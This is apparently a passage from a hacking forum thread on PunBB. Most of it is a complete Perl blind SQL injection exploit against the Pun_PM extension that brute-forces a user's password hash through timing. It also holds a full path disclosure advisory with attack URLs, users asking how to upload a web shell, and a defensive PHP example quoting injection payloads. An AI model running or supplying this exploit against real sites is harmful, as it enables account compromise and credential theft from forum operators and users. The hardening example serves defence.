    # The error occurred on line 525 in ./WaRWolFz/extensions/pun_pm/functions.php
    # Database reported: Errore di sintassi nella query SQL vicino a '\ AND m.sender_id = 2 AND m.deleted_by_sender = 0' linea 1 (Errno: 1064).

    use strict;
    use warnings;

    use LWP::UserAgent;
    use HTTP::Cookies;
    use HTTP::Request::Common;
    use Time::HiRes;
    use IO::Socket;

    my ($UserName,$PassWord,$ID) = @ARGV;
    if (@ARGV < 3) {
        &usage();
        exit();
    }

    my $Message = "";
    my $Hash = "";
    my ($Time,$Time_Start,$Time_End,$Response);
    my ($Start,$End);
    my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
    my $Host = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link
    my $Method = HTTP::Request->new(GET => $Host);
    my $Cookies = new HTTP::Cookies;
    my $HTTP = new LWP::UserAgent(
                agent => 'Mozilla/5.0',
                max_redirect => 0,
                cookie_jar => $Cookies,
            ) or die $!;
    my $Referrer = "http://www.warwolfz.org/";
    my $DefaultTime = request($Referrer);

    sub request {
        $Referrer = $_[0];
        $Method->referrer($Referrer);
        $Start = Time::HiRes::time();
        $Response = $HTTP->request($Method);
        $Response->is_success() or die "$Host : ", $Response->message,"\n";
        $End = Time::HiRes::time();
        $Time = $End - $Start;
        return $Time;
    }

    sub Blind_SQL_Jnjection {
        my ($dec,$hex) = @_;
        return "./misc.php?section=pun_pm&pmpage=write&message_id=-1 OR 1!=(SELECT IF((ASCII(SUBSTRING(`password`,${dec},1))=${hex}),benchmark(200000000,CHAR(0)),0) FROM `users` WHERE `id`=${ID})--";
    }

    sub Clear() {
        my $launch = $^O eq 'MSWin32' ? 'cls' : 'clear';
        return system($launch);
    }

    sub Login() {
        # the proxy is set on the user agent (HTTP::Cookies has no proxy method)
        if (defined $ARGV[4] && $ARGV[4] =~ /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}?$/) {
            $HTTP->proxy(['http','ftp'], 'http://'.$ARGV[4]) or die $!;
        }
        my $Get = $HTTP->get($Host.'login.php');
        my $csrf_token = "";
        if ($Get->content =~ /type="hidden" name="csrf_token" value="([a-f0-9]{1,40})/i) { #ByPassing csrf_token hidden input
            $csrf_token = $1;
        }
        my $Login = $HTTP->post($Host.'login.php',
                    [
                        form_sent        => '1',
                        redirect_url    => $Host.'login.php',
                        csrf_token        => $csrf_token,
                        req_username    => $UserName,
                        req_password    => $PassWord,
                        save_pass        => '1',
                        login => 'Login',
                    ]) || die $!;

        if ($Login->content =~ /Verrai trasferito automaticamente ad una nuova pagina in 1 secondo/i) { #English Language: You should automatically be forwarded to a new page in 1 second.
            return 1;
        } else {
            return 0;
        }
    }

    sub usage {
        Clear();
        {
            print " \n [0-Day] PunBB <= 1.3.4 Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit\n";
            print " ------------------------------------------------------ \n";
            print " * USAGE:                                             *\n";
            print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
            print " * perl name_exploit.pl [username] [password] [id]    *\n";
            print " * [proxy] is optional (ex: 151.57.4.97:8080)         *\n";
            print " ------------------------------------------------------ \n";
            print " *         Powered By Dante90, WaRWolFz Crew          *\n";
            print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
            print " ------------------------------------------------------ \n";
        };
        exit;
    }

    sub refresh {
        Clear();
        {
            print " \n [0-Day] PunBB <= 1.3.4 Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit\n";
            print " ------------------------------------------------------ \n";
            print " * USAGE:                                             *\n";
            print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
            print " * perl name_exploit.pl [username] [password] [id]    *\n";
            print " * [proxy] is optional (ex: 151.57.4.97:8080)         *\n";
            print " ------------------------------------------------------ \n";
            print " *         Powered By Dante90, WaRWolFz Crew          *\n";
            print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
            print " ------------------------------------------------------ \n";
        };
        print $_[0] ."\n";
        print " * Victime Site: " . $_[1] . "\n";
        print " * Default Time: " . $_[2] . " seconds\n";
        print " * BruteForcing Hash: " . chr($chars[$_[3]]) . "\n";
        print " * BruteForcing N Char Hash: " . $_[6] . "\n";
        print " * SQL Time: " . $_[5] . " seconds\n";
        print " * Hash: " . $_[4] . "\n";
    }

    sub Main(){
        if (Login() == 1) {
            $Message = " * Logged in as: ".$UserName;
        } elsif (Login() == 0) {
            $Message = " * Login Failed.";
            refresh($Message, $Host, $DefaultTime, "0", $Hash, $Time, "1");
            print " * Exploit Failed                                     *\n";
            print " ------------------------------------------------------ \n";
            exit;
        }
        for (my $I=1; $I<=40; $I++) { #N Hash characters
            for (my $J=0; $J<=15; $J++) { #0 -> F
                $Time_Start = time();
                my $Get1 = $HTTP->get($Host.Blind_SQL_Jnjection($I,$chars[$J]));
                $Time_End = time();
                $Time = request($Referrer);
                refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
                if ($Time_End - $Time_Start > 6) {
                    $Time = request($Referrer);
                    refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
                    if ($Time_End - $Time_Start > 6) {
                        syswrite(STDOUT,chr($chars[$J]));
                        $Hash .= chr($chars[$J]);
                        $Time = request($Referrer);
                        refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
                        last;
                    }
                }
            }
            if ($I == 1 && length $Hash < 1 && !$Hash) {
                print " * Exploit Failed                                     *\n";
                print " ------------------------------------------------------ \n";
                exit;
            }
            if ($I == 40) {
                print " * Exploit Successfully Executed                      *\n";
                print " ------------------------------------------------------\n ";
                system("pause");
            }
        }
    }

    Main();

    #WaRWolFz Crew



    # Inj3ct0r.com [2010-07-27]
    ===========================================================
    PunBB Automatic Image Upload 1.0 Shell Upload Vulnerability
    ===========================================================


     
    #15 547, 21 Sep 2010
    Last edited: 23 Sep 2010
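The Attachment extension's `secure_str` check (post 14) and Pun_PM's `message_id` handling (the functions.php excerpt above) fail in the same way: the value is checked loosely (an unanchored regex, or `escape()`, which only deals with quote characters) and is then concatenated unquoted into a WHERE clause, which is exactly what both blind-injection scripts lean on. The following added example, not code from either extension, puts each loose check next to a strict one that yields an integer and nothing else, fed with the benign and the injection-shaped inputs from the posts (constructed here); `addslashes()` stands in for `$forum_db->escape()` and the function names are assumptions.

```php
<?php
// Added example (not PunBB/extension code): the two loose identifier checks
// from this thread beside strict ones.

/** Vulnerable shape from the Attachment extension: unanchored regex, and the
 *  raw value is what travels on. Returns it when the regex "matches". */
function secure_str_loose(string $secureStr): ?string
{
    // '~(\d+)f(\d+)~' matches anywhere in the string, so "1f1' AND ..." passes.
    return preg_match('~(\d+)f(\d+)~', $secureStr, $m) ? $secureStr : null;
}

/** Hardened: the whole value must be <digits>f<digits>, and only the two
 *  integers are returned, never the original string. */
function secure_str_strict(string $secureStr): ?array
{
    if (!preg_match('~\A(\d{1,10})f(\d{1,10})\z~', $secureStr, $m)) {
        return null;
    }
    return array((int) $m[1], (int) $m[2]);
}

/** Vulnerable shape from pun_pm: escaping only matters inside a quoted
 *  literal; in an unquoted numeric comparison the payload passes untouched. */
function where_message_loose(string $messageId, int $senderId): string
{
    $escaped = addslashes($messageId);   // stand-in for $forum_db->escape()
    return 'm.id = ' . $escaped . ' AND m.sender_id = ' . $senderId . ' AND m.deleted_by_sender = 0';
}

/** Hardened: accept only a decimal integer and cast it before use. */
function where_message_strict(string $messageId, int $senderId): ?string
{
    if (!ctype_digit($messageId)) {
        return null;
    }
    return 'm.id = ' . (int) $messageId . ' AND m.sender_id = ' . $senderId . ' AND m.deleted_by_sender = 0';
}

// Constructed inputs: a benign value and the shape each exploit sends.
$secureStrs = array('1f1', "1f1' AND (IF(1=1,BENCHMARK(1,CHAR(0)),1))#");
$messageIds = array('7', '-1 OR 1!=(SELECT IF(1=1,benchmark(1,CHAR(0)),0))--');

foreach ($secureStrs as $s) {
    printf("secure_str %-46s loose accepts=%s strict=%s\n",
        var_export($s, true),
        var_export(secure_str_loose($s) !== null, true),
        json_encode(secure_str_strict($s)));
}
foreach ($messageIds as $id) {
    printf("message_id %s\n  loose : %s\n  strict: %s\n",
        var_export($id, true),
        where_message_loose($id, 2),
        var_export(where_message_strict($id, 2), true));
}
// The loose checks accept both payloads (the loose WHERE clause carries the
// injected "OR ..." verbatim); the strict ones accept only '1f1' -> [1,1]
// and '7' -> "m.id = 7 AND ...", returning null for the rest.
```

The same cast-before-use rule is what makes the `BENCHMARK()`-based timing in both scripts impossible: once the comparison value can only be an integer, there is nowhere for a subquery to go.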
  16. foozzi

    foozzi Member

    Code:
    # Exploit Title: Punbb 1.3.4 Full Path Disclosure
    # Date: 07/11/2010
    # Author: SYSTEM_OVERIDE, OverSecurityCrew
    # Software Link: http://punbb.informer.com/
    # Vulnerability Type: Full Path Disclosure
    # Version: 1.3.4
    
    An attacker can learn the ROOTPATH.

    Vulnerable files:
    Code:
    /search.php  /userlist.php moderate.php
    Example:

    Code:
    http://www.site.com/[path]/search.php?action=search&keywords[]=&author[]=&search_in=all&sort_by=0&SORT_DAshow_as=DESC&topics=&search=Submit+search
    http://www.site.com/[path]/userlist.php?username[]=&show_group=-1&sort_by=username&sort_dir=ASC&search=Avvia+ricerca
    http://www.site.com/[path]/moderate.php?get_host[]=
     
    foozzione likes this.
  17. DarkMaster

    DarkMaster New Member

    Can anyone tell me how to get a shell through the admin panel? (I do have access to the forum's admin panel.)
     
  18. SergioBlog

    SergioBlog New Member

    Is there any way to find out the version at all?
     
  19. DarkMaster

    DarkMaster New Member

    Log into the admin panel - it says clearly which version it is. :)
    I've logged in myself, but I can't figure out what to do next, how to upload a shell.
     
  20. Pirotexnik

    Pirotexnik Member

    Guys, can anyone suggest exploits/bugs for PunBB 1.3

    Or for the following plugins (the extensions folder)

    Thanks